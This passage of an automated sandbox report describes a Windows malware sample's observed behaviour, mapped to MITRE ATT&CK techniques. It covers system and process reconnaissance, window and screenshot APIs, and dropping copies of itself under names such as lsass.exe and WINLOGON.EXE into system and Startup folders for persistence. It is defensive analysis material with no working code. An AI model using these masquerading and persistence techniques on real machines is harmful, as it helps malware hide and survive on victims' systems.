\"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005760)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004400)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000756)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003332)\n \"WINLOGON.EXE\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00000964)\n \"WINLOGON.EXE\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00000964)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000964)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004188)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"IsWow64Process\" with parameter \"960\" - (UID: 00000000-00000960)\n \"D3_08.exe\" called \"IsWow64Process\" with parameter \"5992\" - (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"1712\" - (UID: 00000000-00001712)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"5792\" - (UID: 00000000-00005792)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"5760\" - (UID: 00000000-00005760)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"3332\" - (UID: 00000000-00003332)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"4392\" - (UID: 00000000-00004392)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"4268\" - (UID: 00000000-00004268)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001712)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005496)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005836)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005808)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005760)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004400)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000756)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003332)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000964)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005724)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004188)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004308)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006084)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003580)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004268)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004240)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003616)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004580)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003456)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001880)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003792)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004416)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004500)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002728)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00000960)\n \"D3_08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00001712)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"GetForegroundWindow\" (UID: 00000000-00000960)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"GetWindowTextA\" (UID: 00000000-00000960)\n \"D3_08.exe\" called \"GetWindowTextA\" (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"GetWindowTextA\" (UID: 00000000-00001712)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"4c01023a\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"4c01023a\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"290107b5\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter D3_08.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00000960)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"D3_08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"496\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"504\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"512\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"604\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"684\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"768\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"824\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"852\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"888\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1252\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1276\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1332\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1516\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1544\"}\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1556\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"\\Device\\KsecDD\"\n \"D3_08.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\services.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46887 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46907 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46793 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46884 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46720 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46811 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46791 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46730 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46874 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46803 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46925 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46917 bytes starting with PE header signature to file \"C:\\D3_08\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46920 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46771 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 46760 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 